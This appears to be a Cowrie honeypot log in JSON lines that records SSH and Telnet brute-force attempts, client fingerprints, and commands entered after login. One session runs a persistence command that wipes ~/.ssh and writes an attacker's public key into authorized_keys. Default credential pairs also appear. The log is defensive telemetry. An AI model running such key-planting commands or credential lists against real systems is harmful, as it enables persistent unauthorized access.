{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38074,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db56b41c9b9","protocol":"ssh","message":"New connection: 212.227.235.229:38074 (1.2.3.4:22) [session: 1db56b41c9b9]","sensor":"my-vps","timestamp":"2025-08-31T06:26:34.296121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:26:34.994619Z","src_ip":"212.227.235.229","session":"1db56b41c9b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:26:34.995633Z","src_ip":"212.227.235.229","session":"1db56b41c9b9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:26:35.595672Z","src_ip":"212.227.235.229","session":"2ed1a683cc07"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:36.926446Z","src_ip":"212.227.235.229","session":"2ed1a683cc07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48582,"dst_ip":"1.2.3.4","dst_port":22,"session":"3873243d923b","protocol":"ssh","message":"New connection: 212.227.235.229:48582 (1.2.3.4:22) [session: 3873243d923b]","sensor":"my-vps","timestamp":"2025-08-31T06:26:37.253331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:37.254781Z","src_ip":"212.227.235.229","session":"3873243d923b"}
{"eventid":"cowrie.session.closed","duration":13.680227041244507,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:37.389377Z","src_ip":"212.227.235.229","session":"6c3e05c05885"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:26:37.576704Z","src_ip":"212.227.235.229","session":"3873243d923b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:26:38.903797Z","src_ip":"212.227.235.229","session":"3873243d923b"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:39.200123Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:39.226566Z","src_ip":"212.227.235.229","session":"3873243d923b"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":60204,"dst_ip":"1.2.3.4","dst_port":23,"session":"bcce22cb053b","protocol":"telnet","message":"New connection: 79.124.8.120:60204 (1.2.3.4:23) [session: bcce22cb053b]","sensor":"my-vps","timestamp":"2025-08-31T06:26:40.861543Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:26:40.901947Z","src_ip":"79.124.8.120","session":"bcce22cb053b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:26:40.931216Z","src_ip":"79.124.8.120","session":"bcce22cb053b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"password1","message":"login attempt [tomcat/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:26:41.185402Z","src_ip":"212.227.235.229","session":"1db56b41c9b9"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:26:41.702013Z","src_ip":"212.227.125.160","session":"73edb20862bd"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:43.066905Z","src_ip":"212.227.235.229","session":"1db56b41c9b9"}
{"eventid":"cowrie.session.closed","duration":"83.6","message":"Connection lost after 83.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:45.570050Z","src_ip":"212.227.125.160","session":"73edb20862bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45690,"dst_ip":"1.2.3.4","dst_port":22,"session":"502efa86b9ea","protocol":"ssh","message":"New connection: 212.227.235.229:45690 (1.2.3.4:22) [session: 502efa86b9ea]","sensor":"my-vps","timestamp":"2025-08-31T06:26:47.270115Z"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:26:49.992262Z","src_ip":"212.227.235.229","session":"97e1475a5eba"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:26:54.119999Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:26:54.212753Z","src_ip":"212.227.235.229","session":"502efa86b9ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55922,"dst_ip":"1.2.3.4","dst_port":22,"session":"e682e7000b90","protocol":"ssh","message":"New connection: 212.227.125.160:55922 (1.2.3.4:22) [session: e682e7000b90]","sensor":"my-vps","timestamp":"2025-08-31T06:26:55.283228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:26:55.810680Z","src_ip":"212.227.125.160","session":"e682e7000b90"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:26:55.811651Z","src_ip":"212.227.125.160","session":"e682e7000b90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48296,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c52d016f1d2","protocol":"ssh","message":"New connection: 212.227.125.160:48296 (1.2.3.4:22) [session: 9c52d016f1d2]","sensor":"my-vps","timestamp":"2025-08-31T06:26:56.003755Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:56.004728Z","src_ip":"212.227.125.160","session":"9c52d016f1d2"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:56.005739Z","src_ip":"212.227.125.160","session":"9c52d016f1d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48306,"dst_ip":"1.2.3.4","dst_port":22,"session":"bff2e00fab50","protocol":"ssh","message":"New connection: 212.227.125.160:48306 (1.2.3.4:22) [session: bff2e00fab50]","sensor":"my-vps","timestamp":"2025-08-31T06:26:56.353526Z"}
{"eventid":"cowrie.client.version","version":"GET /favicon.ico HTTP/1.1","message":"Remote SSH version: GET /favicon.ico HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:56.354405Z","src_ip":"212.227.125.160","session":"bff2e00fab50"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:56.355240Z","src_ip":"212.227.125.160","session":"bff2e00fab50"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"password1","message":"login attempt [tomcat/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:26:57.594774Z","src_ip":"212.227.125.160","session":"e682e7000b90"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:58.976883Z","src_ip":"212.227.125.160","session":"e682e7000b90"}
{"eventid":"cowrie.session.closed","duration":"85.0","message":"Connection lost after 85.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:03.876760Z","src_ip":"212.227.235.229","session":"97e1475a5eba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24716,"dst_ip":"1.2.3.4","dst_port":22,"session":"72b5c821f162","protocol":"ssh","message":"New connection: 212.227.235.229:24716 (1.2.3.4:22) [session: 72b5c821f162]","sensor":"my-vps","timestamp":"2025-08-31T06:27:07.378005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:27:07.379583Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:27:07.588807Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.login.success","username":"root","password":"123zxc123","message":"login attempt [root/123zxc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:27:08.473445Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:27:08.914824Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:27:08.915532Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:27:08.916435Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:09.129103Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:27:09.618282Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:27:09.619286Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:27:09.833438Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:09.834698Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17222,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3c57f1451a0","protocol":"ssh","message":"New connection: 212.227.235.229:17222 (1.2.3.4:22) [session: c3c57f1451a0]","sensor":"my-vps","timestamp":"2025-08-31T06:27:10.051903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:27:10.056763Z","src_ip":"212.227.235.229","session":"c3c57f1451a0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:27:10.273775Z","src_ip":"212.227.235.229","session":"c3c57f1451a0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:27:11.145720Z","src_ip":"212.227.235.229","session":"c3c57f1451a0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:12.367768Z","src_ip":"212.227.235.229","session":"c3c57f1451a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25125,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9ee10326a98","protocol":"ssh","message":"New connection: 212.227.235.229:25125 (1.2.3.4:22) [session: a9ee10326a98]","sensor":"my-vps","timestamp":"2025-08-31T06:27:12.584868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:27:12.588445Z","src_ip":"212.227.235.229","session":"a9ee10326a98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:27:12.806612Z","src_ip":"212.227.235.229","session":"a9ee10326a98"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:27:13.679984Z","src_ip":"212.227.235.229","session":"a9ee10326a98"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:13.898740Z","src_ip":"212.227.235.229","session":"72b5c821f162"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:27:13.899938Z","src_ip":"212.227.235.229","session":"a9ee10326a98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57750,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdcf2cc1321c","protocol":"ssh","message":"New connection: 212.227.125.160:57750 (1.2.3.4:22) [session: cdcf2cc1321c]","sensor":"my-vps","timestamp":"2025-08-31T06:27:25.978448Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43796,"dst_ip":"1.2.3.4","dst_port":22,"session":"fabe7fcf0e27","protocol":"ssh","message":"New connection: 212.227.235.229:43796 (1.2.3.4:22) [session: fabe7fcf0e27]","sensor":"my-vps","timestamp":"2025-08-31T06:27:32.617445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:27:33.383453Z","src_ip":"212.227.235.229","session":"fabe7fcf0e27"}
